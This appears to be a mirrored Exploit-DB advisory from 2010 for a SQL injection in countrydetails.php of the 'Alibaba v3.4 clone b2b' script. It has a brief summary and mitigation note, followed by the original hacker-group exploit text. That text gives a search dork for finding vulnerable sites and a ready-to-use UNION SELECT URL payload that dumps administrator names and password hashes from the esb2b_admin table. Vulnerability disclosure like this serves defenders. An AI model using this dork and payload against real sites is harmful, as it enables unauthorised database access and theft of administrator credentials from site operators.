Alibaba v3.4 clone b2b(countrydetails.php) SQL Injection Vulnerability

vendor:

Alibaba v3.4 clone b2b

by:

Dr.0rYX and Cr3w-DZ

CVSS

HIGH

SQL Injection

CWE

Product Name: Alibaba v3.4 clone b2b

Affected Version From: 3.4

Affected Version To: 3.4

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2010

Alibaba v3.4 clone b2b(countrydetails.php) SQL Injection Vulnerability

A vulnerability in Alibaba v3.4 clone b2b(countrydetails.php) allows an attacker to inject malicious SQL commands into the application. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code in the vulnerable parameter.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

Exploit Title:Alibaba v3.4 clone b2b(countrydetails.php) SQL Injection Vulnerability   
Date: 29.11.2010  
Author: Dr.0rYX and Cr3w-DZ  
Category: webapps/0day  
***************************************************************************************************
*           _______       ___________.__                     ___________      .__                  *
*      ____ \   _  \______\__    ___/|  |__           _____  \_   _____/______|__| ____ _____      *
*     /    \/  /_\  \_  __ \|    |   |  |  \   ______ \__  \  |    __) \_  __ \  |/ ___\\__  \     *
*    |   |  \  \_/   \  | \/|    |   |   Y  \ /_____/  / __ \_|     \   |  | \/  \  \___ / __ \_   *
*    |___|  /\_____  /__|   |____|   |___|  /         (____  /\___  /   |__|  |__|\___  >____  /   *
*         \/       \/                     \/               \/     \/                  \/     \/    *
*                                      .__  __             __                                      *
*      ______ ____   ____  __ _________|__|/  |_ ___.__. _/  |_  ____ _____    _____               *
*     /  ___// __ \_/ ___\|  |  \_  __ \  \   __<   |  | \   __\/ __ \\__  \  /     \              *
*     \___ \\  ___/\  \___|  |  /|  | \/  ||  |  \___  |  |  | \  ___/ / __ \|  Y Y  \             *
*    /____  >\___  >\___  >____/ |__|  |__||__|  / ____|  |__|  \___  >____  /__|_|  /             *
*         \/     \/     \/                       \/                 \/     \/      \/              *
*                                                        Pr!v8 Expl0iT AND t00l **                 *                                                                  
*                                      ALGERIAN HACKERS                                            *      
*********************************- NORTH-AFRICA SECURITY TEAM -*************************************
[!]             Alibaba v3.4 clone b2b(countrydetails.php) SQL Injection Vulnerability 
[!] Author    : Dr.0rYX and Cr3w-DZ
[!] MAIL      : sniper-dz@hotmail.de<mailto:sniper-dz@hotmail.de>  &  Cr3w@hotmail.de<mailto:Cr3w@hotmail.de>
 
***************************************************************************/
[!] notice :
 Dr.0rYX:  MY OLD EMAIL VX3@HOTMAIL.DE  CLOSED
           MY NEW EMAIL IS  SNIPER-DZ@HOTMAIL.DE

***************************************************************************/

[ Software Information ]
 
[+] Vendor : http://www.alibabaclone.com/
[+] script   : Alibaba v3.4 clone b2b 
[+] Download : http://www.alibabaclone.com/ (sell script )
[+] Vulnerability : SQL injection
[+] Dork : inurl:"countrydetails.php?es_id="

**************************************************************************/

[ Vulnerable File ]

http://server/countrydetails.php?es_id=sql[N.A.S.T ]

[ Exploit ]

http://server/countrydetails.php?es_id=-1+UNION+ALL+select+1,Group_concat(CONVERT(es_id USING utf8),0x3a,CONVERT(es_admin_name USING utf8),0x3a,CONVERT(es_pwd USING utf8)),3,4+from+esb2b_admin--

[  GReet ]

[+] : evilzone.org , exploit-db.com ,Inj3ct0r 1337 Exploit DataBase 1337db.com , ALL HACKERS MUSLIMS